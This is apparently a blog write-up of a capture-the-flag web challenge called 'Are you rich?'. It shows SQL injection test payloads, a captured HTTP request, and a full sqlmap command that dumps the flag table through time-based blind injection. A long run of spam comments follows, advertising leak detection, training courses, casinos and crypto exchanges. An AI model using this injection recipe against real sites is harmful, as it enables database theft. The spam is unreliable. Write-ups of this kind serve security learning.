Descriptions:
Are you rich? Buy the flag!Solution:
http://52.197.140.254/are_you_rich/
ps. You should NOT pay anything for this challenge
Some error messages which is non-related to challenge have been removed
1. Access to website have 2 functions, Get our bitcoin address and Verify payment.
2. Try to get our bitcoin address, It will generate some Bitcoin Address and go to verify it.
3. Not have enough money, I guess after get our bitcoin it may insert this bitcoin into database and have verify payment to check. I try to SQL Injection in Address field.
4. ' or 1=1# --- Found more than 1 records?
5. ' or 1=2# --- does not have enough confirmed money?
4. Confirm the parameter address have vulnerable to SQL Injection, I use Burp Suite to capture HTTP request and copy it to text file.
POST /are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c HTTP/1.1 Host: 52.197.140.254 Proxy-Connection: keep-alive Content-Length: 79 Cache-Control: max-age=0 Origin: http://52.197.140.254 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Referer: http://52.197.140.254/are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c Accept-Encoding: gzip, deflate Accept-Language: th,en;q=0.8 address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c&flag_id=flag1&submit=
5. Using SQLmap -r option to Load HTTP request from a text file, SQLmap verify this vulnerable is Time-Based Blind SQL Injection, and final SQLmap option that use for get a flag.
python sqlmap.py -r web50.txt -p address --threads=5 --technique=T --dbms=mysql --dbs --string="Found more than" -D areyourich -T flag1 -C flag --dump
6. Wait a several minute to retrieve a flag.
In Burp Suite (Union Based)
Flag: hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}
شركة كشف تسربات المياه بالقطيف
ตอบลบكشف تسربات المياه بالقطيف
افضل شركة كشف تسربات المياه بالقطيف
شركة كشف تسربات بالقطيف
Great Article Journal Paper Writing Services projects for cse JavaScript Training in Chennai JavaScript Training in Chennai Project Centers in Chennai
ลบGood work. Spoken English Thane
ตอบลบCheck out this poker, thug life, casino online, your poker, online betting, MKLOPIYRH DGETFYH FAREVCBF TRYF VGHNST, and much more stuff like this amazing anime cartoons, casinogame online.Check out this poker, thug life, casino online, your poker, online betting, MKLOPIYRH DGETFYH FAREVCBF TRYF VGHNST, and much more stuff like this amazing anime cartoons, casinogame online.
ตอบลบI was very happy to find this site. I really enjoyed reading this article today and think it might be one of the best articles I have read so far. I wanted to thank you for this excellent reading !! I really enjoy every part and have bookmarked you to see the new things you post. Well done for this excellent article. Please keep this work of the same quality.
ตอบลบData Science Course in Bangalore
Excellent Blog! I would like to thank for the efforts you have made in writing this post. I am hoping the same best work from you in the future as well. I wanted to thank you for this websites! Thanks for sharing. Great websites!
ตอบลบData Science Training in Bangalore
I am a new user of this site, so here I saw several articles and posts published on this site, I am more interested in some of them, hope you will provide more information on these topics in your next articles.
ตอบลบdata analytics training in bangalore
I just got to this amazing site not long ago. I was actually captured with the piece of resources you have got here. Big thumbs up for making such wonderful blog page!
ตอบลบdata analytics course in bangalore
Great post i must say and thanks for the information. Education is definitely a sticky subject. However, is still among the leading topics of our time. I appreciate your post and look forward to more.
ตอบลบData Science Course in Bangalore
Binance, BTCTurk, Paribu sahibi kim merak ediyorsanız tıklayın: Binance, BTCTurk, Paribu Sahibi
ตอบลบBinance, BTCTurk, Paribu ne zaman kuruldu merak ediyorsanız tıklayın: Binance, BTCTurk, Paribu Ne Zaman Kuruldu
Komisyon oranları için tıklayın: BtcTurk, Binance, Paribu Güvenilir mi? Komisyon Oranları
Hangisi güvenilir merak ediyorsanız tıklayın: Btcturk, Binance, Paribu Güvenilir mi